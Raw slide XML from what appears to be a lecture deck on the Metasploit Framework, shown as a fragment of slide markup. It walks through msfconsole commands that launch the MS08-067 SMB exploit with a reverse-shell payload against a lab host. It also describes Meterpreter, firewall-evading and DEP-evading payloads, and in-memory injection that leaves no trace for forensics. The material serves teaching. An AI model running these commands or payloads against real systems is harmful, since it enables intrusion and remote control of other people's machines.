                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LHOST     192.168.11.53    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>yes       The listen address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   LPORT     4444             yes       The listen port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13863206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i="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More about the Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> exploit(ms08_067_netapi) &gt; show targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit targets:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Id  Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   --  ----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   0   Automatic Targeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   1   Windows 2000 Universal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   2   Windows XP SP0/SP1 Universal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   3   Windows XP SP2 English (NX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   4   Windows XP SP3 English (NX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>61  Windows 2003 SP2 Japanese (NO NX)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304286073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988"/>
            <a:ext cx="10080626" cy="863700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31750" y="765175"/>
            <a:ext cx="9144000" cy="5500688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use exploit/windows/smb/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set RHOST [remote host] 192.168.11.51</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set LHOST [local host] 192.168.11.53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Module options (exploit/windows/smb/ms08_067_netapi):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   Name     Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RHOST    192.168.11.51    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>yes       The target address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   RPORT    445              yes       Set the SMB service port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Payload options (windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   Name      Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   ----      ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   EXITFUNC  thread           yes       Exit technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>seh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>, thread, none, process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LHOST     192.168.11.53    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>yes       The listen address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   LPORT     4444             yes       The listen port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85653367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Payload Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1268413"/>
            <a:ext cx="9144000" cy="4862512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Inline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These payloads are a single package of exploit and payload. They are inherently more stable, but because of their size, they can't always be used in small vulnerable memory areas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Staged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These payloads essentially are able to fit into very small spaces and create a foothold on the system and then pull rest of the payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4032861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38" y="0"/>
            <a:ext cx="9144001" cy="5942013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is the all powerful payload that we most often want on a victim system. It works by .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> injection and resides entirely in memory, leaving no trace of its existence on the hard drive or file system. It has a number of specific commands and scripts developed for it, enabling us to largely work our will on the victim system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>PassiveX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This payload is for use when firewall rules restrict outbound traffic. In essence, it uses ActiveX through Internet Explorer to hide its outbound traffic and evade the firewall by using HTTP requests and responds just as any browser would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3735595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0350"/>
            <a:ext cx="9144000" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>PassiveX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This payload is for use when firewall rules restrict outbound traffic. In essence, it uses ActiveX through Internet Explorer to hide its outbound traffic and evade the firewall by using HTTP requests and responds just as any browser would.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NoNX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some CPUs, there is a built-in security feature called DEP (Data Execution Prevention). In Windows, it is referred to as No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or NX. The idea behind this security feature is to keep from data making its way to the CPU and being executed. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NoNX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payloads are designed to evade this safety feature of modern CPU's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3821024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0350"/>
            <a:ext cx="9144000" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Ord</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These type of payloads work on nearly all Windows operating systems. These are extremely small, but somewhat unstable. They are dependent upon loading a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (dynamic link library) into the exploited process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These payloads, as their implies, are designed to work on IPv6 networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reflective DLL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These payload modules are injected directly into the target process while it is running in memory, thereby never writing anything to the hard drive and leaving little or no evidence behind.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5270896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Sample Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61442" name="Picture 6" descr="Screen Shot 2016-02-21 at 7.55.00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1438"/>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682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Blind Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Reverse Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62466" name="Picture 2" descr="Screen Shot 2016-02-21 at 7.55.24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075" y="1557338"/>
            <a:ext cx="85471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156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2776"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Meta-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Inpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A payload gives attacker a powerful command shell to interact with the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runs entirely in memory and never utilizes hard drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stealthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evaded from many anti-virus systems and forensic tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220002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Target information (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contact Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First/Last Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phone Numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host/Domain names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Various server details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operating System Details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database Details</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3977391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96752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
